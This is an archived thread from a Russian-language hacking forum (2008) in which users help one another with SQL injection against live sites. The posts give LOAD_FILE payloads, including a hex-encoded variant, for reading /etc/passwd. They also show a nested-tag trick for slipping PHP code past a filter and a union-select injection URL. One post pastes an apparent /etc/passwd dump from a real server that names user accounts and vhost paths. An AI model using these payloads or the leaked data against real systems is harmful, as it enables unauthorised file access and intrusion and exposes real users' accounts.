ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 177 из 1393 « Первая < 77127167 173 174 175 176 177 178 179 180 181 1872272776771177 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1761  
Старый 24.04.2008, 14:37
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248

Репутация: 668


Отправить сообщение для Doom123 с помощью ICQ
По умолчанию
что делать если например я в sql иньекции в поле вывода пишу скажем 123 он выводит а если пишу
<? phpinfo() ?>(через char())

он вырезает эти строки а точнее вырезается всё от наяала <?
 

  #1762  
Старый 24.04.2008, 15:38
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию
Хочешь сделать php-инклудинг через SQL-инъекцию? о.О Вероятность такого крайне мала. Он тебе выведет <? phpinfo(); ?>, но не выполнит как пхп-код
 

  #1763  
Старый 24.04.2008, 15:47
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248

Репутация: 668


Отправить сообщение для Doom123 с помощью ICQ
По умолчанию
ну я попробовал просто страннно что всё что начинается с <? до ?> обрезается или хз что там происходит и ещё например я ввожу load_file(/etc/passwd) не пишет что запрос не верный но и не выводит файл

хотя не, грузит файл
Последний раз редактировалось Doom123; 24.04.2008 в 15:54..
 

  #1764  
Старый 24.04.2008, 15:50
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию
что можно извлеч из файла /etc/passwd ?
 

  #1765  
Старый 24.04.2008, 15:52
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию
Цитата:
Сообщение от GOGA075  
что можно извлеч из файла /etc/passwd ?
логины пользователей
 

  #1766  
Старый 24.04.2008, 15:54
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию
Цитата:
например я ввожу load_file(/etc/passwd) не пишет что запрос не верный но и не выводит файл
Должно быть
Код:
LOAD_FILE('/etc/passwd')
или
LOAD_FILE("/etc/passwd")
или
LOAD_FILE(0x2F6574632F706173737764)
Если ни тот, ни другой, ни третий запрос не вывел ничего, значит, нет соответствующих прав.
 

  #1767  
Старый 24.04.2008, 15:56
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию
PHP код:
fidim:x:2002:101::/:/ftponly sphera_pop:x:2002:101::/:/bin/sh root:x:0:0::/: bin:x:1:1:bin:/bindaemon:x:2:2:daemon:/sbinadm:x:3:4:adm:/var/admlp:x:4:7:lp:/var/spool/lpdsync:x:5:0:sync:/sbinshutdown:x:6:0:shutdown:/sbinhalt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mailnews:x:9:13:news:/var/spool/newsuucp:x:10:14:uucp:/var/spool/uucpoperator:x:11:0:operator:/rootgames:x:12:100:games:/usr/gamesgopher:x:13:30:gopher:/usr/lib/gopher-datagdm:x:42:42::/home/gdmxfs:x:43:43:X Font Server:/etc/X11/fsnobody:x:99:99:Nobody:/: ftp:x:2002:101::/ftp/pub/anonymous:/ftponly tom:x:2002:101::/ftp/pub/tom:/ftponly support:x:2002:101::/ftp/pub/support:/ftponly spice:x:2002:101::/ftp/pub/spice:/ftponly jn:x:2002:101::/var/www/vhosts/fireflyweb:/ftponly fump:x:2002:101::/ftp/pub/fump:/ftponly meef:x:2002:101::/ftp/pub/meef:/ftponly jdelgrosso:x:2002:101::/ftp/pub/jdelgrosso:/ftponly spam:x:2002:101::/ftp/pub/spam:/ftponly manic:x:2002:101::/var/www/vhosts/manicmondays/mp3:/ftponly sdstage:x:2002:101::/var/www/vhosts/suddendeath_stage:/ftponly bugbase:x:2002:101::/var/www/html/bugbase:/ftponly sonicbids:x:2002:101::/ftp/pub/sonicbids:/ftponly 
 

  #1768  
Старый 24.04.2008, 16:05
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию
Doom123
Цитата:
всё что начинается с <? до ?> обрезается
чисто теоретически:
<<??>? phpinfo() ?> - <??> обрежется, получится <? phpinfo() ?>
Последний раз редактировалось aka PSIH; 24.04.2008 в 16:08..
 

  #1769  
Старый 24.04.2008, 16:15
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248

Репутация: 668


Отправить сообщение для Doom123 с помощью ICQ
По умолчанию
aka PSIH ты был прав) но скрипт не выполнился) вывело просто <? phpinfo()?>
 

  #1770  
Старый 24.04.2008, 16:25
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248

Репутация: 668


Отправить сообщение для Doom123 с помощью ICQ
По умолчанию
кстате через иньекцию команду update можно выполнить? если да дайте плиз пример
например урла с дыркой

www.site.ru/script.php?id=-1+union+select+1,2/*
 
 
Страница 177 из 1393 « Первая < 77127167 173 174 175 176 177 178 179 180 181 1872272776771177 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ